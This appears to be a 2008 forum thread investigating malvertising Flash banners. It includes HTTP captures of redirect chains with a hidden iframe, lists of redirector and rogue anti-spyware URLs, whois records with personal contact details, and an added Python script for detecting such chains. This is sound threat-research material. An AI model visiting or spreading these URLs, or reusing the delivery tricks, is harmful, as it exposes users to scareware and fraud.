getfreecar.com/stats.php?campaign=union&u=1152354215430
IPB Image

Maybe it's time for RealMedia to perform some "spring cleaning", what do you think ? diablo.gif
Kimberly
Classmates, Expedia, voyages-sncf ... to name only a few, prefer to "manage" their adverts themselves using the RealMedia software. I don't have a problem with that unless I get a reply like the one below when contacting them to REPORT a banner.

From voyages-sncf ....

QUOTE
Dear Sir or Madam,

We have received your message in which you share your remarks concerning the free download of the software « erreur chasseur ».
We urge you not to act on this alert.
Indeed, we inform you that this message is sent to your internet browser via advertisements broadcast on the internet. To protect yourself from it, it is therefore necessary to have an up-to-date anti-virus.
We recommend that you remain vigilant while browsing the internet when faced with unknown windows offering paid services.
voyages-sncf.com will never ask you to download this kind of software.
We remain at your disposal for any further questions.

Google translation - I don't even wanna waste time on it myself, quite understandable isn't it ....

QUOTE
Madam,

We have received your message in which you give your comments to download free software error "fighter".
We encourage you not to be in response to this alert.
Indeed, we inform you that this message is sent to your Internet browser via advertising on the Internet. It is therefore necessary to withstand them to have an anti virus updated.
We recommend that you remain vigilant during your internet browsing windows facing unknowns offering paid services.
Never voyages-sncf.com do you propose to download this software.
We remain at your disposal for any question.

Jeez, are we guys / gals lucky that RealMedia took care of everything because (1) their reply is a bit late and (2) they didn't fully understand the problem did they !!!!

I'm so angry right now that I have only 3 words to say: Block Flash content.

Ref : Can I protect myself from these adverts?
Kimberly
IPB Image

Banner.
r2d2adverising.com/edges/creatives/Dottunes_728x90/flash/579e957e1139c5df793c0ec5e29b8a36
Campaign.
officialstat.com/crossdomain.xml

officialstat.com/c/index.php?id=MW0xRjhVWHNzWUp4MTNIc0tqNlhoPTEyMDQxOTgxNDImcG56Y252dGE9aGm7NkiZym7NkiZ3JlYXm7NkiZnbAYNkiDgNmYNkiDgNm

waytotheprofit.com/?cmpid=useternity&adid=intl
<h4>
Notes
</h4>
Seeing that the banner was hosted at r2d2adverising.com, I got curious how they served this one. It all starts with an iframe.

CODE
<html><head><META HTTP-EQUIV="PRAGMA" CONTENT="NO-CACHE"><META HTTP-EQUIV="CACHE-CONTROL" CONTENT="NO-CACHE"><script>setInterval("location.reload()",60000*4);</script><base target=_blank><style>body{height:100%;margin:0;padding:0;}</style></head><body bgcolor=#888888><center><iframe id='23456821' name='23456821' src='http://linktarget.com/f.php?n=23456821&what=zone:37' framespacing='0' frameborder='no' scrolling='no' width='468' height='60'><a href='http://linktarget.com/c.php?n=23456821' target='_blank'><img src='http://linktarget.com/v.php?what=zone:48&n=23456821' border='0'></a></iframe></center></body></html>

Starting point.
linktarget.com/f.php?n=23456821&what=zone:37
CODE
GET /cgi-bin/cpm/nlad.cgi?uid=mediatarget&cid=gaming&ord=98355464 HTTP/1.1
Accept: */*
Referer: http://linktarget.com/f.php?n=23456821&what=zone:37
Accept-Language: en-us
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: m.rmbclick.com
Connection: Keep-Alive

HTTP/1.1 200 OK
Date: Thu, 27 Mar 2008 05:33:40 GMT
Server: Apache/1.3.19 (Unix) mod_perl/1.25
Set-Cookie: RMBClick_mediatarget_NetworkURL=; domain=; path=/; expires=Monday, 25-Mar-2018 05:33:40 GMT;
Expires: now
Cache-Control: post-check=0,pre-check=0, max-age=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: application/x-javascript

188
document.write('<IFRAME SRC="http://m.rmbclick.com/creatives/ecas/wen2.html" name="max" width="728" height="90" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no"></IFRAME>');
document.write('<IFRAME SRC="http://39m.net/creatives/max/ad2.html" name="buy" width="0" height="0" frameborder="no" border="0" MARGGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no"></IFRAME>');
0

We are only interested in m.rmbclick.com/creatives/ecas/wen2.html.

CODE
GET /serving/showbanner_net.php?nid=1017&chad=1&cs=&adtype=1&sid=13&pid=13&uid=24534842283589 ......
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://m.rmbclick.com/creatives/ecas/wen2.html
Accept-Language: en-us
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: serving.rmbclick.com
Connection: Keep-Alive

HTTP/1.1 200 OK
Date: Thu, 27 Mar 2008 04:06:04 GMT
Server: Apache/2.2.4 (Fedora)
X-Powered-By: PHP/5.2.2
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: roi=a%3A1%3A%7Bi%3A0%3Ba%3A5%3A%7Bs%3A3%3A%22cid%22%3Bs%3A2%3A%2268%22%3Bs%3A6%3A%22siteid%22%3Bs%3A2%3A%2213%22%3Bs%3A3%3A%22kid%22%3Bs%3A3%3A%22858%22%3Bs%3A7%3A%22pub_nid%22%3BN%3Bs%3A7%3A%22ads_nid%22%3BN%3B%7D%7D; expires=Sat, 26-Apr-2008 04:06:04 GMT; path=/; domain=.rmbclick
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8

f6
<html><head></head>
<body topmargin='0' leftmargin='0'><iframe src="http://creative.clicksor.com/network_1017/68/c784754399.html" FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=NO width="728" height="90"></iframe></body> </html>
0

CODE
GET /network_1017/68/c784754399.html HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://serving.rmbclick.com/serving/showbanner_net.php?nid=1017&chad=1&cs=&adtype=1&sid=13&pid=13&uid=24534842283589 .......
Accept-Language: en-us
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: creative.clicksor.com
Connection: Keep-Alive

HTTP/1.1 200 OK
Date: Thu, 27 Mar 2008 04:06:05 GMT
Server: Apache/2.0.54 (Fedora)
Last-Modified: Fri, 14 Mar 2008 00:46:04 GMT
ETag: "e44e73-179-feaf4b00"
Accept-Ranges: bytes
Content-Length: 377
Connection: close
Content-Type: text/html; charset=UTF-8

<html><head><title>AD</title><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"></head><body topmargin="0" leftmargin="0">
........<iframe width="728" height="90" noresize scrolling=No frameborder=0 marginheight=0 marginwidth=0 src="http://m.rmbclick.com/cgi-bin/cpm/ultra-ad.cgi?uid=dottunes_swf&cid=dottunes&type=image"></IFRAME>
........</body></html>

CODE
GET /cgi-bin/cpm/ultra-ad.cgi?uid=dottunes_swf&cid=dottunes&type=image HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://creative.clicksor.com/network_1017/68/c784754399.html
Accept-Language: en-us
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: m.rmbclick.com
Connection: Keep-Alive

HTTP/1.1 302 Found
Date: Thu, 27 Mar 2008 05:33:47 GMT
Server: Apache/1.3.19 (Unix) mod_perl/1.25
Set-Cookie: RMBClick_dottunes_swf_NetworkURL=; domain=; path=/; expires=Monday, 25-Mar-2018 05:33:47 GMT;
Expires: now
Cache-Control: post-check=0,pre-check=0, max-age=0
Pragma: no-cache
Location: http://r2d2adverising.com/edges/banner_show.php?b_name=Dottunes_728x90
Connection: close
Transfer-Encoding: chunked
Content-Type: text/plain

fa
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A HREF="http://r2d2adverising.com/edges/banner_show.php?b_name=Dottunes_728x90">here</A>.<P>
</BODY></HTML>
0

CODE
GET /edges/banner_show.php?b_name=Dottunes_728x90 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://creative.clicksor.com/network_1017/68/c784754399.html
Accept-Language: en-us
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Connection: Keep-Alive
Host: r2d2adverising.com

Here I'm leaving a part out, I've attached the complete text to the topic because it's way too long. Below are just a few snippets.

CODE
swfobject.embedSWF("creatives/Dottunes_728x90/flash/579e957e1139c5df793c0ec5e29b8a36", "alternative_content_2101", "728", "90", "6.0.0",
false, flashvars, params, attributes);


GET /edges/libs/swfobject.js HTTP/1.1
Accept: */*
Referer: http://r2d2adverising.com/edges/banner_show.php?b_name=Dottunes_728x90
Accept-Language: en-us
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: r2d2adverising.com

HTTP/1.1 200 OK
Content-Type: application/x-javascript
ETag: "3665875932862002964"
Accept-Ranges: bytes
Last-Modified: Tue, 22 Jan 2008 11:57:21 GMT
Content-Length: 10995
Date: Thu, 27 Mar 2008 04:06:09 GMT
Server: lighttpd/1.4.13

/*.SWFObject v2.0 rc1 <http://code.google.com/p/swfobject/>
.Copyright (c) 2007 Geoff Stearns, Michael Williams, and Bobby van der Sluis
.This software is released under the MIT License <http://www.opensource.org/licenses/mit-license.php>
*/

And of course the SWF file ...

CODE
GET /edges/creatives/Dottunes_728x90/flash/579e957e1139c5df793c0ec5e29b8a36 HTTP/1.1
Accept: */*
Referer: http://r2d2adverising.com/edges/banner_show.php?b_name=Dottunes_728x90
x-flash-version: 9,0,47,0
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: r2d2adverising.com

CODE
GET /c/index.php?id=MW0xRjhVWHNzWUp4MTNIc0tqNlhoPTEyMDQxOTgxNDImcG56Y252dGE9aGm7NkiZym7NkiZ3JlYXm7NkiZnbAYNkiDgNmYNkiDgNm HTTP/1.1
Accept: */*
Referer: http://r2d2adverising.com/edges/creatives/Dottunes_728x90/flash/579e957e1139c5df793c0ec5e29b8a36
x-flash-version: 9,0,47,0
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: officialstat.com
Connection: Keep-Alive

I will check out the domains we saw here later on. creative.clicksor.com catches my attention again because I stumbled on them in another advertising problem here.

Update 28 March 01:30 AM

r2d2adverising.com - 190.15.73.254
http://www.robtex.com/dns/r2d2adverising.com.html

linktarget.com - 83.149.101.2
83.149.101.0-83.149.101.255 LEASEWEB LeaseWeb P.O. Box 93054 1090BB AMSTERDAM Netherlands

m.rmbclick.com - 202.76.88.129
202.76.64.0-202.76.127.255 CPCNET-HK CPCNet Hong Kong Ltd. 20/F, Lincoln House, Taikoo Place, 979 King's

rmbclick.com A 202.76.88.129
NS dns1.rmbclick.com 202.76.88.129
NS dns2.rmbclick.com 202.76.88.130
MX mail.rmbclick.com 202.76.88.130

serving.rmbclick.com - 66.48.81.213
66.48.0.0-66.48.255.255 UUNETCA8-A

serving.adsrevenue.clicksor.net - 66.48.81.209
clicksor.net - 66.48.81.202

creative.clicksor.com - 66.48.78.212
clicksor.com - 66.48.78.246
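The chain above (publisher iframe, linktarget.com, rmbclick, clicksor, a 302 to r2d2adverising.com, the SWF, then officialstat.com) can be reconstructed from a capture rather than read off by hand. The script below is an added example, not code from this thread or from any company named in it; it runs on constructed transactions modelled on the capture above (publisher.example, the trimmed query strings and the id value are placeholders) and flags the cross-domain Flash call-home.

```python
"""Reconstruct a malvertising delivery chain from captured HTTP transactions.
Added example, not code from the forum thread or from any company named in it.
The transactions are constructed to mirror the capture above; "publisher.example"
and the trimmed query strings are placeholders."""
from collections import deque
from urllib.parse import urlsplit


def host_of(url):
    return (urlsplit(url).hostname or "").lower()


def tx(url, referer=None, flash=False, status=200, location=None):
    """One constructed transaction: request URL and headers, response status/Location."""
    headers = {"host": host_of(url)}
    if referer:
        headers["referer"] = referer
    if flash:
        headers["x-flash-version"] = "9,0,47,0"   # header the Flash player adds
    return {"url": url, "headers": headers, "status": status, "location": location}


def build_edges(transactions):
    """(parent, child, kind): 'referer' when the child was fetched while the parent was
    the active document or SWF, 'redirect' when the parent answered 3xx + Location."""
    edges = []
    for t in transactions:
        ref = t["headers"].get("referer")
        if ref:
            edges.append((ref, t["url"], "referer"))
        if t["location"] and 300 <= t["status"] < 400:
            edges.append((t["url"], t["location"], "redirect"))
    return edges


def find_path(edges, start, goal):
    """Shortest hop-by-hop path from start to goal (BFS); [] if unreachable."""
    graph = {}
    for parent, child, _kind in edges:
        graph.setdefault(parent, []).append(child)
    queue, seen = deque([[start]]), {start}
    while queue:
        path = queue.popleft()
        if path[-1] == goal:
            return path
        for nxt in graph.get(path[-1], []):
            if nxt not in seen:
                seen.add(nxt)
                queue.append(path + [nxt])
    return []


def hosts_in_path(path):
    """Distinct hosts in traversal order: every party the advert passed through."""
    hosts = []
    for url in path:
        if not hosts or hosts[-1] != host_of(url):
            hosts.append(host_of(url))
    return hosts


def flash_beacons(transactions):
    """Flash-player requests (x-flash-version) to a host other than the one that served
    the referring SWF. This cross-domain call-home (crossdomain.xml, then a stats or
    campaign URL) is the tell-tale of the banners in this thread; a SWF loading assets
    from its own host is normal."""
    findings = []
    for t in transactions:
        ref = t["headers"].get("referer", "")
        if "x-flash-version" in t["headers"] and ref and host_of(ref) != host_of(t["url"]):
            findings.append((host_of(ref), t["url"]))
    return findings


PUBLISHER = "http://publisher.example/page.html"   # placeholder for the site with the ad slot
F_PHP = "http://linktarget.com/f.php?n=23456821&what=zone:37"
WEN2 = "http://m.rmbclick.com/creatives/ecas/wen2.html"
SHOWBANNER = "http://serving.rmbclick.com/serving/showbanner_net.php?nid=1017&sid=13"
CLICKSOR = "http://creative.clicksor.com/network_1017/68/c784754399.html"
ULTRA_AD = "http://m.rmbclick.com/cgi-bin/cpm/ultra-ad.cgi?uid=dottunes_swf&cid=dottunes&type=image"
BANNER_SHOW = "http://r2d2adverising.com/edges/banner_show.php?b_name=Dottunes_728x90"
SWF = "http://r2d2adverising.com/edges/creatives/Dottunes_728x90/flash/579e957e1139c5df793c0ec5e29b8a36"
CROSSDOMAIN = "http://officialstat.com/crossdomain.xml"
BEACON = "http://officialstat.com/c/index.php?id=CONSTRUCTED_ID"

SAMPLE = [
    tx(F_PHP, referer=PUBLISHER),
    tx(WEN2, referer=F_PHP),                        # iframe written by nlad.cgi's JavaScript
    tx(SHOWBANNER, referer=WEN2),
    tx(CLICKSOR, referer=SHOWBANNER),
    tx(ULTRA_AD, referer=CLICKSOR, status=302, location=BANNER_SHOW),
    tx(BANNER_SHOW, referer=CLICKSOR),              # browser follows the 302
    tx(SWF, referer=BANNER_SHOW, flash=True),       # same host as the SWF: not flagged
    tx(CROSSDOMAIN, referer=SWF, flash=True),       # Flash call-home to a third host
    tx(BEACON, referer=SWF, flash=True),
]

if __name__ == "__main__":
    print(" -> ".join(hosts_in_path(find_path(build_edges(SAMPLE), PUBLISHER, BEACON))))
    for swf_host, url in flash_beacons(SAMPLE):
        print(f"SWF served by {swf_host} called out to {url}")
```

On a real capture, fill SAMPLE from the request/response pairs and run find_path from the publisher page to each flagged beacon to see which ad network introduced the creative.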
Kimberly
Social Engineering. ohmy.gif

I don't often comment on articles but honestly, I can't even call that social engineering ...

Even a 14 year old kid or a n00b would notice some weird things. If the guy / gal in your department falls for THIS ... lol time to fire him / her ... unless you go after the $$$ of course ....

Website Title: ForceUp - Online advertisement agency
ICANN Registrar: TUCOWS INC.
IP Address: 84.243.252.88
Created: 2005-09-09
Expires: 2008-09-09
Server Type: nginx/0.4.13
Whois History: 44 records have been archived since 2005-09-21.
Dedicated Hosting: forceup.com is hosted on a dedicated server.

Domain servers in listed order:
NS2.FORCEUP.COM 190.15.73.252
NS1.FORCEUP.COM 190.15.73.251

www.forceup.com/contactus.html
IPB Image
Website Title: Opensolutions - Functional Expertise, Cutting Edge Technologies, Global Vision and Rapid Growth....
ICANN Registrar: TUCOWS INC.
Created: 2004-02-17
Expires: 2009-02-17
Server Type: lighttpd/1.4.13
IP Address: 190.15.73.254
Whois History: 38 records have been archived since 2004-05-25
Reverse IP: 69 other sites hosted on this server.

Domain servers in listed order:
NS1.OPENSOLS.COM 190.15.73.251
NS2.OPENSOLS.COM 190.15.73.252

www.opensols.com/new_tpls/Contactus.html

IPB Image
Quite similar ain't they ...
______________________________

www.opensols.com/new_tpls/clients.htm
IPB Image
Whoops I did it again ... roflmao.gif

IPB Image
Maybe my internet connection got hijacked ??? wacko.gif
Kimberly
<h4>
Another goodie
</h4>
IPB Image
This is probably the banner that did hit NHL.com back in November 2007. The advertising link is still active.

Banner.
m1.2mdn.net/1612895/NHL_MediaMan_728x90_flash.swf
Campaign.
adtraff.com/statsa.php?u=23423424&campaign=pushmama
The redirect still partially works as seen below.

CODE
GET /statsa.php?u=23423424&campaign=pushmama HTTP/1.1
Accept: */*
Referer: http://m1.2mdn.net/1612895/NHL_MediaMan_728x90_flash.swf
x-flash-version: 9,0,47,0
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: adtraff.com
Connection: Keep-Alive

HTTP/1.1 200 OK
Server: nginx/0.4.13
Date: Fri, 28 Mar 2008 19:30:43 GMT
Content-Type: application/x-shockwave-flash
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.2.0-8+etch7
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Fri, 28 Mar 2008 19:30:43 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache

1f
FWS.....0
......D.....C....@...
0

NHL.com was first mentioned in Sandi's blog and later on in a case study called The Era of Rogue Security Software.
______________________________

Update March 29 2008.

The advertisement banner has been pulled off the main site last night. Keep in mind that it will take some time before it propagates through Akamai caches.

CODE
GET /1612895/NHL_MediaMan_728x90_flash.swf HTTP/1.1
Host: m1.2mdn.net
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Connection: close

• Finding host IP address...
• Host IP address = 72.165.141.105
• Finding TCP protocol...
• Binding to local socket...
• Connecting to host...
• Sending request...
• Waiting for response...

Receiving Header:
HTTP/1.1·404·Not·Found(CR)(LF)
Content-Length:·43(CR)(LF)
Content-Type:·image/gif(CR)(LF)
Cache-Control:·max-age=86400(CR)(LF)
Date:·Sat,·29·Mar·2008·19:10:29·GMT(CR)(LF)
Connection:·close
Kimberly
<h4>
Another goodie
</h4>
IPB Image
Seen on reddit.com.

Banner.
m1.2mdn.net/1487544/160x600_Cyberipod.swf
Campaign.
workhomecenter.com/crossdomain.xml
workhomecenter.com/stats.php?campaign=5pentt00&u=1206974120161
Kimberly
<h4>
123greetings.com
</h4>
IPB Image
Bad April Fool's day joke for 123greetings.com. Sandi has all the details here.

Banner.
imagec05.247realmedia.com/RealMedia/ads/Creatives/123Greet/ReachWe_LB_10981A/123_728x90.swf
Campaign.
adtds2.promoplexer.com/statsa.php?campaign=123
Kimberly
<h4>
New banners
</h4>
IPB Image
Details here.

Banner.
id325708.adszedo.com/300x250.swf
Campaign.
adtds2.promoplexer.com/statsa.php?campaign=708
Seen on www.diynetwork.com

Details.

adtds2.promoplexer.com/statsa.php?campaign=708&u=1207161218478
tds.promoplexer.com/statsa.php
tds.promoplexer.com/statsg.php
tds.promoplexer.com/swf/gnida.swf
adtds2.promoplexer.com/in.cgi?12
antispywaredeluxe.com/scanner/scan.php?landid=2&depid=&cid=&parid=&bs=1
______________________________

IPB Image
Details here.

Campaign.
stathome.net/c/index.php?id=cG9NaDRTS0xmeXF3TzNSaE8wTlNoPTEyMDY3MjExNDQmcG56Y252dGE9Y3m7NkiZ5dG5leXm7NkiZwNQYNkiDgNmYNkiDgNm

waytotheprofit.com/?cmpid=pilgarlic5&adid=intl
<h4>
adszedo.com - 67.205.75.11
</h4>

Another dodgy advertising company ...

Website Title: 404 - Not Found
ICANN Registrar: ESTDOMAINS, INC.
Created: 2008-02-05
Expires: 2009-02-05
Name Server: NS.ADSZEDO.COM
Name Server: NS1.EVERYDNS.NET
Name Server: NS2.EVERYDNS.NET
Name Server: NS3.EVERYDNS.NET
Name Server: NS4.EVERYDNS.NET
Whois Server: whois.estdomains.com
Server Type: lighttpd/1.4.18
IP Address: 67.205.75.11
IP Location - Canada - Groupe Iweb Technologies Inc
Dedicated Hosting: adszedo.com is hosted on a dedicated server.

Registrant:
PrivacyProtect.org
Domain Admin ()
P.O. Box 97
All Postal Mails Rejected, visit Privacyprotect.org
Moergestel
null,5066 ZH
NL
Tel. +45.36946676

<h4>
antispywaredeluxe.com - 67.205.75.9
</h4>
ICANN Registrar: ESTDOMAINS, INC.
Created: 2008-02-03
Expires: 2009-02-03
Name Server: NS.ANTISPYWAREDELUXE.COM
Name Server: NS1.US.EDITDNS.NET
Name Server: NS2.US.EDITDNS.NET
Name Server: NS3.US.EDITDNS.NET
Whois Server: whois.estdomains.com
Server Type: lighttpd/1.4.18
IP Address: 67.205.75.9
IP Location - Canada - Groupe Iweb Technologies Inc

Registrant:
PrivacyProtect.org
Domain Admin ()
P.O. Box 97
All Postal Mails Rejected, visit Privacyprotect.org
Moergestel
null,5066 ZH
NL
Tel. +45.36946676

Websites.
  1. Antispywaredeluxe.com
  2. Spywaredestructor.com (*)
(*)

ICANN Registrar: ESTDOMAINS, INC.
Created: 2008-01-17
Expires: 2009-01-17
Registrar Status: ok
Name Server: NS.SPYWAREDESTRUCTOR.COM
Name Server: NS1.US.EDITDNS.NET (has 9,189 domains)
Name Server: NS2.US.EDITDNS.NET
Name Server: NS3.US.EDITDNS.NET

<h4>
c-net 67.205.75.*
</h4>
Has some interesting neighbours to check out.
http://www.robtex.com/cnet/67.205.75.html

imunizator.com - 67.205.75.10

ICANN Registrar: ESTDOMAINS, INC.
Created: 2008-03-09
Expires: 2009-03-09
Name Server: NS.IMUNIZATOR.COM
Name Server: NS1.TWISTED4LIFE.COM (has 5,565 domains)
Whois Server: whois.estdomains.com
Dedicated Hosting: imunizator.com is hosted on a dedicated server.
______________________________

unicastads.com - 67.205.75.13

ICANN Registrar: ESTDOMAINS, INC.
Created: 2008-03-31
Expires: 2009-03-31
Name Server: NS.UNICASTADS.COM
Name Server: NS1.PMSDNS.ORG (has 619 domains)
Name Server: NS2.PMSDNS.ORG
Dedicated Hosting: unicastads.com is hosted on a dedicated server.

<h4>
A very interesting article
</h4>
Malvertizements: web sites versus advertising networks and who we can blame....
Kimberly
<h4>
New banners
</h4>
Sandi found 3 more banners. Details here.

IPB Image
Campaign.
statgroup.net/crossdomain.xml

statgroup.net/c/index.php?id=TXJ5RFBVNkhNOXpSdEs3m7NkiZnRrR3JoPTEyMDY5Nzc4ODEmcG56Y252dGE9dmFmbmVxYmF2cAYNkiDgNmYNkiDgNm

waytotheprofit.com/?cmpid=insardonic&adid=intl
______________________________

IPB Image
Associated URLS.
openadstream.net/crossdomain.xml
openadstream.net/ad0.php?url=ads.doubleclick.net/ads/bid=28/nxtgcbb80290000125ave/direct/wi/ai&key=V24567233828272323&c=134700115
mystats.com/crossdomain.xml
mystats.com/

iexplorer-security.org/?id=634400115
<h4>
Another Goodie
</h4>
IPB Image
Campaign.
thetechnorati.com/statsa.php?u=1197651539&campaign=illationit
This banner is identical to the one that did hit Le Nouvel Observateur back in December 2007.
Kimberly
<h4>
Another Goodie
</h4>
IPB Image
Banner.
lln-videos.metacafe.com/Ads/uniquad/skyauction_728x90-metacafe-sky.swf
Campaign.
newbieadguide.com/statsa.php?campaign=servecup&u=1207239320062
______________________________

IPB Image
Banner.
lln-videos.metacafe.com/Ads/uniquad/skyauction_300x250-metacafe-sky.swf
Campaign.
newbieadguide.com/statsg.php?campaign=bettermy&u=1192995115625
Identified where & when?
metacafe.com - Oct 21 2007
As you may notice, there are 2 distinct campaigns.
______________________________

The main reason that I'm publishing these banners resides in the fact that once malicious content is identified correctly, - read here - the administrator of the site should take the appropriate steps to delete the malicious content. It takes 2 minutes maximum to perform that. If you know the direct URL, those banners are still redirecting. Just imagine yourself for 2 seconds … someone with bad intentions linking to / hosting those banners!!!!

newbieadguide.com/statsa.php?campaign=servecup&u=1207239320062
newbieadguide.com/statsg.php?campaign=servecup&u=1207239320062
newbieadguide.com/swf/gnida.swf?campaign=servecup&u=1207239320062
newbieadguide.com/statss.php?campaign=servecup&u=1207239320062
blessedads.com/?cmpid=servecup
prevedmarketing.com/?tmn=mwatmp&aid=servecup&lid=&ax=1&ed=2&mt_info=4464_2374_2358
scanner2.malware-scan.com/5_swp/?tmn=null&aid=servecup_ma5s_mb1t&lid=&affid=&ax=1&ed=2&mt_info=4464_2374_2358:3958_0_15361
bucksbill.com/.stats/refil.php?p=5&aid=servecup_ma5s_mb1t&lid=keyin&affid=keyin
The second reason why I mention these banners is because we see xads.zedo.com as well as uniquad(s) in the full link. I can't stress enough, when accepting / buying advertisements check out who you're dealing with. This must become your primary reflex; YOUR future depends on it.
CODE
lln-videos.metacafe.com/Ads/uniquad/skyauction_728x90-metacafe-sky.swf?clickTAG=http://xads.zedo.com//ads2/c?a=340874;x=3613;g=27,0;c=487000087,487000087;i=0;n=487;s=2;i%3D0%3Bu%3DL12zYQoBABQAAFlmLu8AAAAF%3Be%3Di%3Bs%3D2%3Bg%3D27%3Bw%3D1%3Bm%3D12%3Bz%3D0.3090584325639172;k=http://www.skyauction.com/

lln-videos.metacafe.com/Ads/uniquad/skyauction_300x250-metacafe-sky.swf?clickTAG=http://xads.zedo.com//ads2/c?a=340237;x=9;g=0,0;c=487000178,487000178;i=0;n=487;s=2;s=2;g=27;m=12;w=1;u=unknown;s%3D2%3Bu%3Dunknown%3Bz%3D0.3158865410992039;k=http://www.skyauction.com/

Now, something puzzles me about those 2 advert banners. The files have been identified on 21 Oct 2007 but when you see the dates on the 2 adverts after I downloaded them, they show 24 December 2007 ... Weird isn't it ? People used to wget know what I mean.
IPB Image
IPB Image
Kimberly
<h4>
Another Banner
</h4>
Forwarded by a contact. This time it's a flash banner for an adult site and the advertisement has been circulating for quite a while.
IPB Image
Banner.
gb.impresionesweb.com/b/an_4137_1_1190830625.swf
Campaign.
adtraff.com/statsa.php?campaign=w00dli5t&u=1207582594269
adtraff.com/statsg.php?campaign=w00dli5t&u=1207582594269
adtraff.com/swf/gnida.swf?campaign=w00dli5t&u=1207582594269
adtraff.com/statss.php?campaign=w00dli5t&u=1207582770052
blessedads.com/?cmpid=w00dli5t&adid=728
prevedmarketing.com/?tmn=mwatmp&aid=w00dli5t&lid=728&ax=1&ed=2&mt_info=4150_1710_2358
scanner2.malware-scan.com/18_swp/?tmn=null&aid=w00dli5t_ma18s_mb1t&lid=728&affid=&ax=1&ed=2&mt_info=4150_1710_2358:3958_0_15359
<h4>
Advertising Co.
</h4>
gb.impresionesweb.com
  • 72.232.130.154
  • 72.232.130.153
  • 72.232.130.151
CustName: Alberto Garcia
Address: Major 34, 3o 1a
City: Terrassa
StateProv: Barcelona
PostalCode: 08221
Country: ES
RegDate: 2006-11-28
Updated: 2006-11-28

NetRange: 72.232.130.0 - 72.232.130.255
CIDR: 72.232.130.0/24
NetName: AOW-PRODUCTIONS-S-L
NetHandle: NET-72-232-130-0-1
Parent: NET-72-232-0-0-1
NetType: Reassigned
Comment: www.aowproductions.com, www.hostxtrem.com
______________________________

impresionesweb.com - 72.232.130.201

Website Title: Impresiones Web
Purchase of advertising, sponsorship paid per CPM impressions and CPC pay per click. impresionesweb online advertising, Impresiones Web: Spanish company for advertising by impressions and pay per click. Impresionesweb is a leading company in online advertising.
ICANN Registrar: DOMAINDISCOVER
Created: 2003-12-30
Expires: 2008-12-30
IP Location - Spain - Alberto Garcia
Name Server: NS1.DOMAINDISCOVER.COM (has 214,952 domains)
Name Server: NS2.DOMAINDISCOVER.COM
Whois Server: whois.domaindiscover.com
Registrant:
Ruboskizo SL
C/ Andres Mellado 29
Madrid, MADRID 28015
ES

Domain Name: IMPRESIONESWEB.COM

Administrative Contact, Technical Contact, Zone Contact:
Ruboskizo SL
Alberto
C/ Andres Mellado 29
Madrid, MADRID 28015
ES
0034915445873
0034915446297 [fax]

Websites.
  1. Impresiones-web.com
  2. Impresiones-web.net
  3. Impresionesweb.com
______________________________

www.iw-advertising.com - 72.232.130.156 (English website)

Website Title: Impresiones Web : Buy and Sell ads on your site. CPM and CPC. Impresiones Web, Online Advertising
Meta Description: Impresiones Web : IW-advertising: Spanish Affiliate Network, payment on impressions and pay per click, end of month. All countries.
ICANN Registrar: ENOM, INC.
Created: 2005-06-22
Expires: 2008-06-22
IP Location - Spain - Alberto Garcia
Name Server: DNS1.NAME-SERVICES.COM (has 4,494,300 domains)
Name Server: DNS2.NAME-SERVICES.COM
Name Server: DNS3.NAME-SERVICES.COM
Name Server: DNS4.NAME-SERVICES.COM
Name Server: DNS5.NAME-SERVICES.COM
Whois Server: whois.enom.com

Registration Service Provided By: ImpresionesWeb
Contact:

Domain name: iw-advertising.com

Registrant Contact:
Ruboskizo SL
NA Alberto ()
+34.915445873
Fax:
C/ Andres Mellado 29
Madrid, 28015

Websites.
  1. Iw-adserver.com
  2. Iw-advertising.com
  3. Iw-pubblicita.com
  4. Iw-publicidad.com
  5. Iw-publicidade.com
  6. Iw-publicite.com
  7. Iw-werbung.com
  8. Iwadserver.com
